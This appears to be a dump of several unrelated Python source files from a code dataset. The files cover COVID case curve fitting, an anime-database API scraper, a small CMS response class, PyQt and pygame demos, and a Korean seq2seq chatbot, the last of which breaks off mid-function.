int):\n s = s.upper()\n if (s, date) in state_data:\n return state_data[(s, date)]\n elif os.path.isfile(f\"assets/state/df_{s}_{date}.csv\"):\n df = pd.read_csv(f\"assets/state/df_{s}_{date}.csv\", index_col=0)\n state_data[(s, date)] = df\n else:\n print('Getting File...')\n df = pd.read_csv(state(s))\n df = df[df['date'] >= 20200304]\n df = df[df['date'] <= date]\n df = pd.DataFrame(df.values[::-1], range(len(df.index)), df.columns)\n df = df.fillna(0)\n df.to_csv(f\"assets/state/df_{s}_{df['date'].iloc[-1]}.csv\")\n state_data[(state, date)] = df\n return df\n\n\ndef get_state_data(s: str, date: int):\n df = get_us_data(date)\n df2 = get_us_data2(date)\n tmp = pd.concat([df[df['Province_State'] == s].sum(), df2[df2['Province_State'] == s].sum()],\n axis=1)\n tmp.columns = ['Cases', 'Deaths']\n population_state[s] = tmp.iloc[-1, 1]\n return tmp.iloc[11:-1].apply(pd.to_numeric).reset_index()\n\n\ndef get_state_fit(df, tp):\n x, y = df.index.values, df[tp].values\n mod = StepModel(form='logistic')\n pars = mod.guess(y, x=x)\n fit = mod.fit(y, pars, x=x, weights=(1 / (x + 1e-3))[::-1])\n return fit\n\n\ndef get_state_model(s, date, tp):\n df = get_state_data(s, date)\n fit = get_state_fit(df, tp)\n complall = find_end_day(fit, 1)\n x0 = np.array(list(range(0, complall + 1)))\n return dict(zip(x0.tolist(), fit.eval(x=x0).astype('int64').tolist()))\n\n\ndef get_state_options(date):\n global population_state\n df = get_us_data(date)\n df2 = get_us_data2(date)\n tmp = df.groupby('Province_State').sum()\n tmp = tmp.select_dtypes(['number'])\n tmp2 = tmp.iloc[:, -1].sort_values(ascending=False) > 100\n states = tmp2.loc[tmp2].index.values\n min_dates = tmp.iloc[:, 5:].gt(100).T.idxmax().apply(date_to_str)\n population_state = {**population_state, **df2.groupby('Province_State')['Population'].sum().to_dict()}\n return states, min_dates, population_state\n\n\ndef get_county_data(s, county, date):\n df = get_us_data(date)\n df2 = get_us_data2(date)\n tmp = pd.concat([df[(df['Province_State'] == s) & (df['Admin2'] == county)].iloc[0, 11:],\n df2[(df2['Province_State'] == s) & (df2['Admin2'] == county)].iloc[0, 11:]], axis=1)\n tmp.columns = ['Cases', 'Deaths']\n population_county[', '.join([county, s])] = tmp.iloc[-1, 1]\n return tmp.iloc[:-1].apply(pd.to_numeric).reset_index()\n\n\ndef get_county_fit(df, tp):\n x, y = df.index.values, df[tp].values\n mod = StepModel(form='logistic')\n pars = mod.guess(y, x=x)\n fit = mod.fit(y, pars, x=x, weights=(1 / (x + 1e-3))[::-1])\n return fit\n\n\ndef get_county_model(s, county, date, tp):\n df = get_county_data(s, county, date)\n fit = get_county_fit(df, tp)\n complall = find_end_day(fit, 1)\n x0 = np.array(list(range(0, complall + 1)))\n return dict(zip(x0.tolist(), fit.eval(x=x0).astype('int64').tolist()))\n\n\ndef get_county_options(date):\n global population_county\n df = get_us_data(date).iloc[:, 5:]\n df2 = get_us_data2(date)\n tmp = df.groupby(['Province_State', 'Admin2']).sum()#.select_dtypes(['number'])\n tmp2 = tmp.iloc[:, -1].sort_values(ascending=False).gt(100)\n tmp2 = np.array([*tmp2.loc[tmp2].index.values])\n counties = dict()\n for s in np.unique(tmp2[:, 0]):\n counties[s] = tmp2[tmp2[:, 0] == s][:, 1].tolist()\n states = list(counties.keys())\n tmp2 = tmp.iloc[:, 5:].gt(100).T.idxmax().apply(date_to_str)\n min_dates = dict()\n for s, c in tmp2.index:\n if s not in min_dates:\n min_dates[s] = {}\n min_dates[s][c] = tmp2.loc[(s, c)]\n tmp = df2.groupby(['Province_State', 'Admin2'])['Population'].sum()\n population_county = {s: tmp.xs(s).to_dict() for s in np.unique(np.array([*tmp.index.values])[:, 0])}\n return states, counties, min_dates, population_county\n\n\ndef get_fit(df, country):\n x, y = df[df[country] > 0][country].index.values, df[df[country] > 0][country].values\n mod = StepModel(form='logistic')\n pars = mod.guess(y, x=x)\n # Give no weight\n # fit = mod.fit(y, pars, x=x)\n\n # Give weight to highest points\n # fit = mod.fit(y, pars, x=x, weights=(1 / (y + 1e-3))[::-1])\n\n # Or give weight to newest points\n fit = mod.fit(y, pars, x=x, weights=(1 / (x + 1e-3))[::-1])\n\n # Or give weight to least and highest points using sech\n # y_max = y.max()\n # coe = 10 / y_max\n # fit = mod.fit(y, pars, x=x, weights=(1 - 1/np.cosh(coe*(y - y_max / 2))))\n\n # Or give weight to least and highest points using polynomial\n # y_max = y.max()\n # fit = mod.fit(y, pars, x=x, weights=pow(y - y_max / 2, 4) / pow(y_max / 2, 4))\n return fit\n\n\ndef get_model(country, date):\n df = get_data(date)\n fit = get_fit(df, country)\n complall = find_end_day(fit, 1)\n x0 = np.array(list(range(df[df[country] > 0].first_valid_index(), complall + 1)))\n return dict(zip(x0.tolist(), fit.eval(x=x0).astype('int64').tolist()))\n\n\ndef get_death_model(country, date):\n df = get_data2(date)\n fit = get_fit(df, country)\n complall = find_end_day(fit, 1)\n x0 = np.array(list(range(df[df[country] > 0].first_valid_index(), complall + 1)))\n return dict(zip(x0.tolist(), fit.eval(x=x0).astype('int64').tolist()))\n\n\ndef find_end_day(fit, percent):\n goal = int(fit.params['amplitude'].value) * percent\n i = 0\n while True:\n if fit.eval(x=i) >= goal:\n return i\n i += 1\n\n\ndef get_prediction(country, date):\n print(date)\n if date in preds:\n return preds[date][country]\n elif os.path.isfile(f\"assets/nn/preds_nn_{date}.csv\"):\n df = pd.read_csv(f\"assets/nn/preds_nn_{date}.csv\", index_col=0)\n preds[date] = df\n return df[country]\n else:\n print(\"File not created...\")\n # pred = make_prediction(df, df.index[-1] + 50)\n # return pred\n return None\n","sub_path":"data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":9350,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"154744982","text":"import time\n\n#打印当前时分秒\ndef test_time():\n\tmyTime = time.strftime('%Y%m%d%H%M%S')\n\tmyTime1 = int(time.time()*10000)\n\t#time.time 输出的是时间戳\n\tprint(myTime)\n\tprint(myTime1)\n\n\n\n\nif __name__ == '__main__':\n\ttest_time()","sub_path":"python/work/useful.py","file_name":"useful.py","file_ext":"py","file_size_in_byte":235,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"294668749","text":"\nimport requests\nimport pandas as pd\nimport time\nimport logging\nfrom argparse import ArgumentParser\n\n\ndef get_range():\n parser = ArgumentParser()\n parser.add_argument('-r', '--range', type=int, dest='range',\n help=\"range\", metavar=\"Range\")\n\n args = parser.parse_args()\n\n if (args.range):\n return(args.range)\n\n return 1\n\n\ndef get_person(id):\n apiUrl = f'{base_url}/person/{i}'\n\n person = {}\n response = object()\n\n try:\n response = requests.get(apiUrl)\n response.raise_for_status()\n except requests.exceptions.Timeout:\n tries = 0\n while tries < 5 and response.status_code != 200:\n tries += 1\n response = requests.get(apiUrl)\n except requests.exceptions.ConnectionError as e:\n logging.error(time.strftime('<%Y-%m-%dT%H:%M:%SZ> ',\n time.gmtime()) + 'Connection error: ' + e.strerror)\n except requests.exceptions.HTTPError as e:\n if (e.response.status_code):\n logging.info(time.strftime('<%Y-%m-%dT%H:%M:%SZ> ',\n time.gmtime()) + 'Person id=' + str(i) + ' does not exist')\n else:\n logging.info(time.strftime('<%Y-%m-%dT%H:%M:%SZ> ', time.gmtime()) +\n 'Error while retrieving ' + str(i) + ' with status code ' + str(response.status_code))\n else:\n jsonResult = response.json()\n\n person['id'] = str(jsonResult['mal_id'])\n person['name'] = jsonResult['name']\n person['given_name'] = jsonResult['given_name']\n person['family_name'] = jsonResult['family_name']\n person['alternate_names'] = jsonResult['alternate_names']\n person['birthday'] = jsonResult['birthday']\n person['member_favorites'] = str(jsonResult['member_favorites'])\n person['about'] = jsonResult['about']\n person['voice_acting_roles'] = [{'role': x['role'],\n 'anime_id': str(x['anime']['mal_id']),\n 'anime_name': x['anime']['name'],\n 'character_id': str(x['character']['mal_id']),\n 'character_name': x['character']['name']}\n for x in jsonResult['voice_acting_roles']]\n person['anime_staff_positions'] = [{'position': x['position'],\n 'anime_id': str(x['anime']['mal_id']),\n 'anime_name': x['anime']['name']}\n for x in jsonResult['anime_staff_positions']]\n person['published_manga'] = [{'position': x['position'],\n 'manga_id': str(x['manga']['mal_id']),\n 'manga_name': x['manga']['name']}\n for x in jsonResult['published_manga']]\n person['timestamp'] = time.strftime(\n '%Y-%m-%dT%H:%M:%SZ', time.gmtime())\n\n logging.info(time.strftime('<%Y-%m-%dT%H:%M:%SZ> ', time.gmtime()) +\n 'Successfully retrieved: ' + jsonResult['name'] + ' id=' + str(id))\n\n return person\n\n\ndef save_to_csv(animes):\n try:\n df = pd.json_normalize(animes)\n df.to_csv(master, mode='a',\n index=False, header=False)\n except:\n logging.error(time.strftime('<%Y-%m-%dT%H:%M:%SZ> ',\n time.gmtime()) + 'Error while saving person data')\n\n\nlogging.basicConfig(filename='../../mal_person_parser.log', level=logging.INFO)\n\nbase_url = 'https://api.jikan.moe/v3'\nup_to = get_range()\n\n# Get the starting point\nmaster = '../../dataset/person.csv'\nstart = 1\ntry:\n mDf = pd.read_csv(master)\n start = int(mDf.iloc[-1, 0]) + 1\n print(f'Retrieving {up_to} items starting from {str(start)}')\nexcept pd.io.common.EmptyDataError:\n print('Person dataset is empty!')\n start = 1\nexcept IndexError:\n print('Person dataset is empty!')\n start = 1\n\npersons = []\n\ncount = 0\n\nfor i in range(start, start + up_to):\n person = get_person(i)\n if (person):\n persons.append(person)\n count = count+1\n\n time.sleep(5)\n\n if(count % 10 == 0 and count != 0):\n save_to_csv(persons)\n persons = []\n\nsave_to_csv(persons)\n","sub_path":"src/mal-scraper/getPersons.py","file_name":"getPersons.py","file_ext":"py","file_size_in_byte":4363,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"496717323","text":"class CMSResponse:\n\n def __init__(self, request, response):\n self.request = request\n self.response = response\n\n def html(self, content, status='200 OK'):\n return self.output(\n content,\n status\n )\n\n def js(self, content):\n return self.output(\n content,\n '200 OK',\n 'text/javascript'\n )\n\n def css(self, content):\n return self.output(\n content,\n '200 OK',\n 'text/css'\n )\n\n def json(self, content):\n return self.output(\n content,\n '200 OK',\n 'application/json'\n )\n\n def jpg(self, filename):\n with open(filename, 'rb') as f:\n content = f.read()\n self.response('200 OK', [\n (\"Content-Type\", 'image/jpg'),\n (\"Content-Length\", str(len(content)))\n ])\n return iter([content])\n\n def sendHTML(self, html, status='200 OK', meta={}):\n import os\n import json\n\n if self.request.get('domain_exists') and self.request.get('setting_exists'):\n with open(self.request.get('setting_json'), 'r') as f:\n setting = json.load(f)\n\n def CMS_Meta(options):\n return meta.get(options, '')\n\n def CMS_Setting(options):\n return setting.get(options, '')\n\n page_render = html\n template_path = self.request.get('theme_dir')\n if not os.path.exists(os.path.join(template_path, html)):\n from .CMSConfig import config\n template_path = config.dir_default\n\n if not os.path.exists(os.path.join(template_path, html)):\n html = '404Theme.html'\n\n from jinja2 import Environment, FileSystemLoader, select_autoescape\n jinja = Environment(\n loader=FileSystemLoader(\n template_path\n ),\n autoescape=select_autoescape(['html', 'xml']),\n enable_async=True,\n block_start_string='',\n block_end_string=' ',\n variable_start_string='',\n variable_end_string=' ',\n comment_start_string='',\n comment_end_string=' '\n )\n content = jinja.get_template(html)\n content = content.render(\n CMS_Meta=CMS_Meta,\n CMS_Setting=CMS_Setting,\n page_render=page_render\n )\n return self.html(content, status)\n\n def show404(self):\n return self.sendHTML('404.html', '404 Not Found')\n\n def output(self, content, status='200 OK', type=\"text/html\"):\n content = bytes(content, encoding='utf-8') if content else b\"\\n\"\n self.response(status, [\n (\"Content-Type\", type),\n (\"Content-Length\", str(len(content)))\n ])\n return iter([content])\n","sub_path":"cmscore/CMSResponse.py","file_name":"CMSResponse.py","file_ext":"py","file_size_in_byte":2957,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"383907088","text":"from PyQt5 import Qt\nfrom PyQt5 import QtCore,QtWidgets,QtGui\nimport sys\nimport PyQt5\nfrom PyQt5.QtWidgets import QApplication, QWidget, QLabel, QFileDialog, QGraphicsRectItem, QGraphicsScene\nfrom PyQt5.QtGui import QPixmap, QImage\nfrom PyQt5.QtCore import QSize\nimport cv2\nimport numpy as np\nfrom matplotlib import pyplot as plt\n\nimport imgui as window\nimport window2\n\n\nclass MainWindow():\n def __init__(self):\n app = QtWidgets.QApplication(sys.argv)\n MainWindow = QtWidgets.QMainWindow()\n self.raw_image = None\n self.ui = window.Ui_MainWindow()\n self.ui.setupUi(MainWindow)\n self.action_connect()\n MainWindow.show()\n self.graph_sence = CARscene()\n sys.exit(app.exec_())\n\n\n# 信号槽绑定\n def action_connect(self):\n self.ui.action.triggered.connect(self.open_file)\n # self.ui.action_2.triggered.connect(self.save_file)\n # self.ui.action_5.triggered.connect(self.recover_img)\n #\n # # 打开摄像头\n # self.ui.action_17.triggered.connect(self.new_camera)\n #\n # # 标记人脸位置\n # self.ui.action_18.triggered.connect(self.mark_face)\n\n# 显示图片\n def show_image(self):\n img_cv = cv2.cvtColor(self.current_img, cv2.COLOR_RGB2BGR)\n img_width, img_height, a = img_cv.shape\n ratio_img = img_width/img_height\n ratio_scene = self.ui.graphicsView.width()/self.ui.graphicsView.height()\n if ratio_img > ratio_scene:\n width = int(self.ui.graphicsView.width())\n height = int(self.ui.graphicsView.width() / ratio_img)\n else:\n width = int(self.ui.graphicsView.height() * ratio_img)\n height = int(self.ui.graphicsView.height())\n img_resize = cv2.resize(img_cv, (height-5, width-5), interpolation=cv2.INTER_AREA)\n h, w, c = img_resize.shape\n bytesPerLine = w * 3\n qimg = QImage(img_resize.data, w, h, bytesPerLine, QImage.Format_RGB888)\n self.scene = QGraphicsScene()\n pix = QPixmap(qimg)\n self.scene.addPixmap(pix)\n self.ui.graphicsView.setScene(self.scene)\n\n# # 显示灰度图像\n# def show_grayimage(self):\n# img_cv = self.gray_image\n# img_width, img_height = img_cv.shape\n# ratio_img = img_width/img_height\n# ratio_scene = self.ui.graphicsView.width()/self.ui.graphicsView.height()\n# if ratio_img > ratio_scene:\n# width = int(self.ui.graphicsView.width())\n# height = int(self.ui.graphicsView.width() / ratio_img)\n# else:\n# width = int(self.ui.graphicsView.height() * ratio_img)\n# height = int(self.ui.graphicsView.height())\n# img_resize = cv2.resize(img_cv, (height-5, width-5), interpolation=cv2.INTER_AREA)\n# h, w = img_resize.shape\n# qimg = QImage(img_resize.data, w, h, w, QImage.Format_Grayscale8)\n# self.scene = QGraphicsScene()\n# pix = QPixmap(qimg)\n# self.scene.addPixmap(pix)\n# self.ui.graphicsView.setScene(self.scene)\n\n#\n# # 显示直方图\n# def show_histogram(self):\n# if self.raw_image is None:\n# return 0\n# img = self.current_img\n# plt.figure(figsize=((self.ui.tab_3.width()-10)/100, (self.ui.tab_3.width()-60)/100), frameon=False)\n# plt.hist(img.ravel(), bins=256, range=[0, 256])\n# plt.axes().get_yaxis().set_visible(False)\n# # plt.axes().get_xaxis().set_visible(False)\n# ax = plt.axes()\n# # 隐藏坐标系的外围框线\n# for spine in ax.spines.values():\n# spine.set_visible(False)\n# plt.savefig('Hist.png', bbox_inches=\"tight\", transparent=True, dpi=100)\n# pix = QPixmap(\"Hist.png\")\n# self.ui.label.setPixmap(pix)\n# self.ui.label_2.setPixmap(pix)\n# self.ui.label_3.setPixmap(pix)\n\n\n\n# 打开图片\n def open_file(self):\n fname = QFileDialog.getOpenFileName(None, '打开文件', './', (\"Images (*.png *.xpm *.jpg)\"))\n if fname[0]:\n img_cv = cv2.imdecode(np.fromfile(fname[0], dtype=np.uint8), -1) # 注意这里读取的是RGB空间的\n self.raw_image = img_cv\n self.last_image = img_cv\n self.current_img = img_cv\n self.show_image()\n self.imgskin = np.zeros(self.raw_image.shape)\n\n# # 恢复图片\n# def recover_img(self):\n# self.current_img = self.raw_image\n# self.show_image()\n# self.show_histogram()\n# self.intial_value()\n#\n# # 饱和度\n# def change_saturation(self):\n# if self.raw_image is None:\n# return 0\n#\n# value = self.ui.horizontalSlider.value()\n# img_hsv = cv2.cvtColor(self.current_img, cv2.COLOR_BGR2HLS)\n# if value > 2:\n# img_hsv[:, :, 2] = np.log(img_hsv[:, :, 2] /255* (value - 1)+1) / np.log(value + 1) * 255\n# if value < 0:\n# img_hsv[:, :, 2] = np.uint8(img_hsv[:, :, 2] / np.log(- value + np.e))\n# self.current_img = cv2.cvtColor(img_hsv, cv2.COLOR_HLS2BGR)\n\n# 明度调节\n# def change_darker(self):\n# if self.raw_image is None:\n# return 0\n# value = self.ui.horizontalSlider_4.value()\n# img_hsv = cv2.cvtColor(self.current_img, cv2.COLOR_BGR2HLS)\n# if value > 3:\n# img_hsv[:, :, 1] = np.log(img_hsv[:, :, 1] /255* (value - 1)+1) / np.log(value + 1) * 255\n# if value < 0:\n# img_hsv[:, :, 1] = np.uint8(img_hsv[:, :, 1] / np.log(- value + np.e))\n# self.last_image = self.current_img\n# self.current_img = cv2.cvtColor(img_hsv, cv2.COLOR_HLS2BGR)\n\n# 人脸识别\n def detect_face(self):\n img = self.raw_image\n face_cascade = cv2.CascadeClassifier('./haarcascade_frontalface_default.xml')\n\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n faces = face_cascade.detectMultiScale(gray, 1.3, 5)\n return faces\nclass CARscene(QtWidgets.QGraphicsScene):\n def __init__(self, parent=None):\n super(CARscene, self).__init__(parent)\n def mousePressEvent(self, QMouseEvent):\n print(\"??\")\n #这行代码是期望显示坐标,奈何永远都是[0.0, 0.0]\n print(QMouseEvent.globalPos())\n\nif __name__ == \"__main__\":\n MainWindow()\n","sub_path":"src/com.ce/img-test/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"117376912","text":"import pygame\n\nsize = width, height = 400, 300\nscreen = pygame.display.set_mode(size)\nclock = pygame.time.Clock()\n\nrunning = True\nx1, y1 = 0, 0\ndrawing = False # режим рисования выключен\nr = 0\nv = 10\nwhile running:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n running = False\n if event.type == pygame.MOUSEBUTTONDOWN:\n drawing = True\n screen.fill(pygame.Color('blue'))\n x1, y1 = event.pos\n r = 0\n pygame.draw.circle(screen, (255, 255, 0), event.pos, int(r))\n if drawing:\n pygame.draw.circle(screen, (255, 255, 0), (x1, y1), int(r))\n pygame.display.flip()\n r += v * clock.tick() / 1000\n screen.fill(pygame.Color('blue'))\npygame.quit()","sub_path":"PyGame2/Yellow_ball.py","file_name":"Yellow_ball.py","file_ext":"py","file_size_in_byte":779,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"525807433","text":"\nfrom PyQt5 import QtCore, QtGui, QtWidgets\nfrom user import Ui_USER\nfrom admin import Ui_Dialog1\nclass Ui_main(object):\n def openwindow(self,event):\n self.window= QtWidgets.QDialog()\n self.ui=Ui_USER()\n self.ui.setupUi(self.window)\n self.window.show()\n main.hide()\n def openwindowadmin(self,event):\n self.window = QtWidgets.QDialog()\n self.ui=Ui_Dialog1()\n self.ui.setupUi(self.window)\n self.window.show()\n main.hide()\n def setupUi(self, main):\n main.setObjectName(\"main\")\n main.setWindowModality(QtCore.Qt.NonModal)\n main.setEnabled(True)\n main.resize(1188, 631)\n main.setMinimumSize(QtCore.QSize(1188, 631))\n main.setMaximumSize(QtCore.QSize(1188, 631))\n font = QtGui.QFont()\n font.setBold(True)\n font.setItalic(True)\n font.setWeight(75)\n main.setFont(font)\n icon = QtGui.QIcon()\n icon.addPixmap(QtGui.QPixmap(\"E:/project/icon.jpg\"), QtGui.QIcon.Normal, QtGui.QIcon.Off)\n main.setWindowIcon(icon)\n main.setWindowOpacity(1.0)\n main.setStyleSheet(\"background-image: url(:/newPrefix/imageedit_8_7961532127.jpg);\")\n main.setSizeGripEnabled(False)\n main.setModal(False)\n self.label = QtWidgets.QLabel(main)\n self.label.setGeometry(QtCore.QRect(170, 490, 171, 41))\n self.label.setStyleSheet(\"background: transparent;\\n\"\n\"font: 75 12pt \\\"Times New Roman\\\";\\n\"\n\"color:rgb(85, 0, 127);\")\n self.label.setObjectName(\"label\")\n self.label.mousePressEvent=self.openwindowadmin\n self.label_2 = QtWidgets.QLabel(main)\n self.label_2.setGeometry(QtCore.QRect(360, 410, 131, 31))\n self.label_2.setStyleSheet(\"background:transparent;\\n\"\n\"font: 14pt \\\"Times New Roman\\\";\\n\"\n\"color:rgb(0, 0, 127)\")\n self.label_2.setObjectName(\"label_2\")\n self.label_2.mousePressEvent = self.openwindow\n\n self.retranslateUi(main)\n QtCore.QMetaObject.connectSlotsByName(main)\n\n def retranslateUi(self, main):\n _translate = QtCore.QCoreApplication.translate\n main.setWindowTitle(_translate(\"main\", \"QWIKLY\"))\n self.label.setText(_translate(\"main\", \"ADMINISTRATOR\"))\n self.label_2.setText(_translate(\"main\", \" USER\"))\nimport xx_rc\n\n\nif __name__ == \"__main__\":\n import sys\n app = QtWidgets.QApplication(sys.argv)\n main = QtWidgets.QDialog()\n ui = Ui_main()\n ui.setupUi(main)\n main.show()\n sys.exit(app.exec_())\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2517,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"601207099","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[13]:\n\n\nfrom tensorflow.keras import models\nfrom tensorflow.keras import layers\nfrom tensorflow.keras import optimizers, losses, metrics\nfrom tensorflow.keras import preprocessing\n\nimport numpy as np\nimport pandas as pd\n\nimport os\nimport re\nimport pickle\n\nfrom konlpy.tag import Okt\n\nclass seq2seq:\n def __init__(self):\n # 태그 단어\n self.PAD = \"\" # 패딩\n self.STA = \"\" # 시작\n self.END = \"\" # 끝\n self.OOV = \"\" # 없는 단어(Out of Vocabulary)\n\n # 태그 인덱스\n self.PAD_INDEX = 0\n self.STA_INDEX = 1\n self.END_INDEX = 2\n self.OOV_INDEX = 3\n\n # 데이터 타입\n self.ENCODER_INPUT = 0\n self.DECODER_INPUT = 1\n self.DECODER_TARGET = 2\n\n # 한 문장에서 단어 시퀀스의 최대 개수\n self.max_sequences = 30\n\n # 임베딩 벡터 차원\n self.embedding_dim = 100\n\n # LSTM 히든레이어 차원\n self.lstm_hidden_dim = 128\n\n # 정규 표현식 필터\n self.RE_FILTER = re.compile(\"[.,!?\\\"':;~()]\")\n\n #학습시 생성한 word_index vocab호출\n with open('./seq2seq/vocab_dict/index_to_word_final.pickle', 'rb') as f:\n self.index_to_word = pickle.load(f)\n\n with open('./seq2seq/vocab_dict/word_to_index_final.pickle', 'rb') as f:\n self.word_to_index = pickle.load(f)\n \n #--------------------------------------------\n # 훈련 모델 인코더 정의\n #--------------------------------------------\n # 입력 문장의 인덱스 시퀀스를 입력���로 받음\n encoder_inputs = layers.Input(shape=(None,))\n # 임베딩 레이어\n encoder_outputs = layers.Embedding(len(self.index_to_word), self.embedding_dim)(encoder_inputs)\n # return_state가 True면 상태값 리턴\n # LSTM은 state_h(hidden state)와 state_c(cell state) 2개의 상태 존재\n encoder_outputs, state_h, state_c = layers.LSTM(self.lstm_hidden_dim,\n dropout=0.1,\n recurrent_dropout=0.5,\n return_state=True)(encoder_outputs)\n # 히든 상태와 셀 상태를 하나로 묶음\n encoder_states = [state_h, state_c]\n #--------------------------------------------\n # 훈련 모델 디코더 정의\n #--------------------------------------------\n # 목표 문장의 인덱스 시퀀스를 입력으로 받음\n decoder_inputs = layers.Input(shape=(None,))\n # 임베딩 레이어\n decoder_embedding = layers.Embedding(len(self.index_to_word), self.embedding_dim)\n decoder_outputs = decoder_embedding(decoder_inputs)\n # 인코더와 달리 return_sequences를 True로 설정하여 모든 타임 스텝 출력값 리턴\n # 모든 타임 스텝의 출력값들을 다음 레이어의 Dense()로 처리하기 위함\n decoder_lstm = layers.LSTM(self.lstm_hidden_dim,\n dropout=0.1,\n recurrent_dropout=0.5,\n return_state=True,\n return_sequences=True)\n\n # initial_state를 인코더의 상태로 초기화\n decoder_outputs, _, _ = decoder_lstm(decoder_outputs,\n initial_state=encoder_states)\n\n # 단어의 개수만큼 노드의 개수를 설정하여 원핫 형식으로 각 단어 인덱스를 출력\n decoder_dense = layers.Dense(len(self.index_to_word), activation='softmax')\n decoder_outputs = decoder_dense(decoder_outputs)\n\n\n\n #--------------------------------------------\n # 훈련 모델 정의\n #--------------------------------------------\n\n # 입력과 출력으로 함수형 API 모델 생성\n model = models.Model([encoder_inputs, decoder_inputs], decoder_outputs)\n\n # 학습 방법 설정\n model.compile(optimizer='rmsprop',\n loss='categorical_crossentropy',\n metrics=['accuracy'])\n\n #--------------------------------------------\n # 예측 모델 인코더 정의\n #--------------------------------------------\n\n # 훈련 모델의 인코더 상태를 사용하여 예측 모델 인코더 설정\n encoder_model = models.Model(encoder_inputs, encoder_states)\n\n\n\n #--------------------------------------------\n # 예측 모델 디코더 정의\n #--------------------------------------------\n\n # 예측시에는 훈련시와 달리 타임 스텝을 한 단계씩 수행\n # 매번 이전 디코더 상태를 입력으로 받아서 새로 설정\n decoder_state_input_h = layers.Input(shape=(self.lstm_hidden_dim,))\n decoder_state_input_c = layers.Input(shape=(self.lstm_hidden_dim,))\n decoder_states_inputs = [decoder_state_input_h, decoder_state_input_c] \n\n # 임베딩 레이어\n decoder_outputs = decoder_embedding(decoder_inputs)\n\n # LSTM 레이어\n decoder_outputs, state_h, state_c = decoder_lstm(decoder_outputs,\n initial_state=decoder_states_inputs)\n\n # 히든 상태와 셀 상태를 하나로 묶음\n decoder_states = [state_h, state_c]\n\n # Dense 레이어를 통해 원핫 형식으로 각 단어 인덱스를 출력\n decoder_outputs = decoder_dense(decoder_outputs)\n\n # 예측 모델 디코더 설정\n decoder_model = models.Model([decoder_inputs] + decoder_states_inputs,\n [decoder_outputs] + decoder_states)\n \n self.model = model\n self.encoder_model = encoder_model\n self.decoder_model = decoder_model\n\n #가중치 불러오기\n self.model.load_weights('./seq2seq/seq2seq_model/seq2seq2_model_weights')\n self.encoder_model.load_weights('./seq2seq/seq2seq_model/seq2seq2_encoder_model_weights')\n self.decoder_model.load_weights('./seq2seq/seq2seq_model/seq2seq2_decoder_model_weights')\n print(self.model.summary())\n \n # 형태소분석 함수\n def pos_tag(self, sentences):\n \n # KoNLPy 형태소분석기 설정\n tagger = Okt()\n \n # 문장 품사 변수 초기화\n sentences_pos = []\n \n # 모든 문장 반복\n for sentence in sentences:\n # 특수기호 제거\n sentence = re.sub(self.RE_FILTER, \"\", sentence)\n #print(sentence)\n # 배열인 형태소분석의 출력을 띄어쓰기로 구분하여 붙임\n sentence = \" \".join(tagger.morphs(sentence))\n sentences_pos.append(sentence)\n \n return sentences_pos\n\n def make_predict_input(self, sentence):\n\n sentences = []\n sentences.append(sentence)\n sentences = self.pos_tag(sentences)\n input_seq = self.convert_text_to_index(sentences, self.word_to_index, self.ENCODER_INPUT)\n \n return input_seq\n\n # 인덱스를 문장으로 변환\n def convert_index_to_text(self, indexs, vocabulary): \n \n sentence = ''\n \n # 모든 문장에 대해서 반복\n for index in indexs:\n if index == self.END_INDEX:\n # 종료 인덱스면 중지\n break;\n if vocabulary.get(index) is not None:\n # 사전에 있는 인덱스면 해당 단어를 추가\n sentence += vocabulary[index]\n else:\n # 사전에 없는 인덱스면 OOV 단어를 추가\n sentence.extend([vocabulary[self.OOV_INDEX]])\n \n # 빈칸 추가\n sentence += ' '\n\n return sentence\n\n \n # 문장을 인덱스로 변환\n def convert_text_to_index(self, sentences, vocabulary, type): \n \n sentences_index = []\n \n # 모든 문장에 대해서 반복\n for sentence in sentences:\n sentence_index = []\n \n # 디코더 입력일 경우 맨 앞에 START 태그 추가\n if type == self.DECODER_INPUT:\n sentence_index.extend([vocabulary[self.STA]])\n \n # 문장의 단어들을 띄어쓰기로 분리\n for word in sentence.split():\n if vocabulary.get(word) is not None:\n # 사전에 있는 단어면 해당 인덱스를 추가\n sentence_index.extend([vocabulary[word]])\n else:\n # 사전에 없는 단어면 OOV 인덱스를 추가\n sentence_index.extend([vocabulary[self.OOV]])\n\n # 최대 길이 검사\n if type == self.DECODER_TARGET:\n # 디코더 목표일 경우 맨 뒤에 END 태그 추가\n if len(sentence_index) >= self.max_sequences:\n sentence_index = sentence_index[:self.max_sequences-1] + [vocabulary[self.END]]\n else:\n sentence_index += [vocabulary[self.END]]\n else:\n if len(sentence_index) > self.max_sequences:\n sentence_index = sentence_index[:self.max_sequences]\n \n # 최대 길이에 없는 공간은 패딩 인덱스로 채움\n sentence_index += (self.max_sequences - len(sentence_index)) * [vocabulary[self.PAD]]\n \n # 문장의 인덱스 배열을 추가\n sentences_index.append(sentence_index)\n\n return np.asarray(sentences_index)\n\n\n # 텍스트 생성\n def generate_text(self, input_seq):\n \n # 입력을 인코더에 넣어 마지막 상태 구함\n states = self.encoder_model.predict(input_seq)\n\n # 목표 시퀀스 초기화\n target_seq = np.zeros((1, 1))\n \n # 목표 시퀀스의 첫 번째에 태그 추가\n target_seq[0, 0] = self.STA_INDEX\n \n # 인덱스 초기화\n indexs = []\n \n # 디코더 타임 스텝 반복\n while 1:\n # 디코더로 현재 타임 스텝 출력 구함\n # 처음에는 인코더 상태를, 다음부터 이전 디코더 상태로 초기화\n decoder_outputs, state_h, state_c = self.decoder_model.predict(\n [target_seq] + states)\n\n # 결과의 원핫인코딩 형식을 인덱스로 변환\n index = np.argmax(decoder_outputs[0, 0, :])\n 